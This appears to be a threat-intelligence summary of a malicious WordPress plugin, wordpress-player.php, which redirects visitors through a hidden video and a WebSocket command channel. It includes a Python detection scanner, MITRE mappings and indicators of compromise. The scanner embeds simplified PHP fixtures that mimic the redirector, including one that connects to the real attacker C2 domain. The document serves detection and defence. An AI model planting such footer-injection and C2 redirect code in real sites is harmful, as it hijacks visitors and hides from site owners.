A malicious WordPress plugin named wordpress-player.php has been found redirecting visitors from at least 26 infected websites to suspicious sites via a hidden video player and a WebSocket connection to an attacker-controlled server. The malware hooks wp_footer to inject its code, skips logged-in users to evade detection, and takes real-time commands for redirection and video playback control. #wordpress-player.php #wp_footer #WebSocketC2
Keypoints
- The wordpress-player.php plugin masquerades as a legitimate WordPress core component to evade administrator detection.
- It uses the wp_footer action hook to inject invisible HTML5 video elements and JavaScript into website footers.
- The injected video plays silently from a suspicious domain (videocdnnetworkalls.monster) to generate fraudulent impressions or support malicious functionality.
- A persistent WebSocket connection to a C2 server (wss://steamycomfort.fun/ws/player) enables attackers to issue live commands, including user redirections and video control.
- The malware avoids execution for logged-in users to remain hidden from site administrators and editors.
- Infection has been identified on at least 26 websites, often spreading through pirated or compromised WordPress installations.
- Mitigation involves thorough malware removal, password resets, two-factor authentication, software updates, and Web Application Firewall deployment.
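As an added example (not code from this page or from Sucuri), the Python scanner below walks a wp-content/plugins tree and checks for the traits listed in the key points. Exact hits on the indicators from the IOC section (file name, domains, wss:// URL) are reported as malicious; the behavioural combination (a wp_footer hook that emits a hidden video element and a WebSocket client, with a logged-in-user check or a JavaScript redirect) is reported as suspicious, which goes beyond the page by surfacing renamed copies on other infrastructure. The plugin files it scans are constructed fixtures written for this example, not the real plugin's source, and the example.invalid hosts are placeholders.

```python
"""Scan a wp-content/plugins tree for the wordpress-player.php redirector.

IOC hits give a 'malicious' verdict; the behavioural trait combination gives
'suspicious'. The fixture files below are constructed for this example.
"""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# Indicators taken from the IOC section of this page (re-fanged for matching).
IOC_FILENAMES = {"wordpress-player.php"}
IOC_STRINGS = (
    "videocdnnetworkalls.monster",
    "steamycomfort.fun",
    "wss://steamycomfort.fun/ws/player",
)

# Behavioural traits. wp_footer alone is used by many legitimate plugins, so a
# verdict is raised only when several traits occur together in one file.
TRAITS = {
    "wp_footer_hook": re.compile(r"add_action\(\s*['\"]wp_footer['\"]", re.I),
    "logged_in_guard": re.compile(r"is_user_logged_in\s*\(", re.I),
    "hidden_video": re.compile(
        r"<video\b[^>]*\b(display\s*:\s*none|opacity\s*:\s*0|visibility\s*:\s*hidden)", re.I),
    "websocket_client": re.compile(r"new\s+WebSocket\s*\(\s*['\"]wss?://", re.I),
    "js_redirect": re.compile(
        r"(?<![\w$])(window\.|document\.|top\.)?location(\.href|\.replace|\.assign)?\s*(=|\()", re.I),
}


def scan_file(path: Path) -> tuple[str, list[str], list[str]]:
    """Return (verdict, matched IOCs, matched traits) for one PHP or JS file."""
    try:
        text = path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return "unreadable", [], []
    iocs = [s for s in IOC_STRINGS if s in text]
    if path.name in IOC_FILENAMES:
        iocs.append(f"filename:{path.name}")
    traits = [name for name, rx in TRAITS.items() if rx.search(text)]
    if iocs:
        verdict = "malicious"
    elif {"wp_footer_hook", "websocket_client"} <= set(traits) and \
            set(traits) & {"logged_in_guard", "hidden_video", "js_redirect"}:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return verdict, iocs, traits


def scan_tree(plugins_dir: Path) -> dict[str, str]:
    """Map every .php/.js file under plugins_dir (relative POSIX path) to a verdict."""
    results = {}
    for p in sorted(plugins_dir.rglob("*")):
        if p.is_file() and p.suffix.lower() in {".php", ".js"}:
            results[p.relative_to(plugins_dir).as_posix()] = scan_file(p)[0]
    return results


# Constructed fixtures (simplified mimics, not the real plugin): one carrying the
# published IOCs, one lookalike on placeholder infrastructure, one benign plugin.
MIMIC_WITH_IOCS = """<?php
/* Plugin Name: WordPress Player */
add_action('wp_footer', function () {
    if (is_user_logged_in()) { return; }
    echo '<video style="display:none" autoplay muted loop>'
       . '<source src="https://videocdnnetworkalls.monster/v.mp4"></video>';
    echo '<script>var ws=new WebSocket("wss://steamycomfort.fun/ws/player");'
       . 'ws.onmessage=function(e){var m=JSON.parse(e.data);'
       . 'if(m.redirect){window.location.href=m.redirect;}};</script>';
});
"""
LOOKALIKE = (MIMIC_WITH_IOCS
             .replace("videocdnnetworkalls.monster", "cdn.example.invalid")
             .replace("wss://steamycomfort.fun/ws/player", "wss://c2.example.invalid/ws"))
BENIGN = """<?php
/* Plugin Name: Footer Note */
add_action('wp_footer', function () {
    echo '<p class="footer-note">Powered by Footer Note</p>';
});
"""


def build_fixture(root: Path) -> None:
    """Write the constructed fixture files into root, mimicking a plugins directory."""
    files = {
        "wordpress-player.php": MIMIC_WITH_IOCS,
        "media-helper/media-helper.php": LOOKALIKE,
        "footer-note/footer-note.php": BENIGN,
    }
    for rel, body in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")


def demo() -> dict[str, str]:
    """Build the fixture in a temporary directory, scan it, return {path: verdict}."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_fixture(root)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, verdict in demo().items():
        print(f"{verdict:10s} {rel}")
```

On a live site, point scan_tree at the real wp-content/plugins directory and treat any "suspicious" result as a file to read by hand: the trait regexes are deliberately broad, and a benign plugin that legitimately opens a WebSocket from the footer will trip them.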
MITRE Techniques
- [T1505] Server Software Component – The plugin is dropped directly into wp-content/plugins/ to execute malicious code. (‘The plugin was dropped directly into the wp-content/plugins/ directory’)
- [T1059] Command and Scripting Interpreter (sub-technique T1059.007, JavaScript) – JavaScript injected into the page footer creates the hidden video element and opens the WebSocket connection in the visitor's browser. (‘The plugin leverages the wp_footer action hook to inject its JavaScript and HTML components’)
- [T1573] Encrypted Channel – Uses WebSocket over wss:// protocol to communicate with the remote C2 server for live command and control. (‘This WebSocket acts like a command and control (C2) channel. It allows the attacker to…’)
- [T1071] Application Layer Protocol – WebSocket protocol used as a communication channel for attacker instructions and tracking users. (‘The malware listens for messages from the WebSocket server and reacts accordingly’)
- [T1087] Account Discovery – A loose mapping: the plugin does not enumerate accounts, it only checks whether the current visitor is logged in and withholds the injection from logged-in users (site admins and editors), which reads more as defense evasion than discovery. (‘The malware avoids execution for logged-in users’)
Indicators of Compromise
- [File Name] Malicious plugin file – wordpress-player.php located in wp-content/plugins/
- [Domain] Suspicious video hosting and C2 infrastructure – videocdnnetworkalls[.]monster, steamycomfort[.]fun
- [URL] Video source URL – hxxps://videocdnnetworkalls[.]monster/
- [WebSocket URL] Command and control server – wss://steamycomfort[.]fun/ws/player
Read more: https://blog.sucuri.net/2025/06/analysis-of-a-malicious-wordpress-plugin-the-covert-redirector.html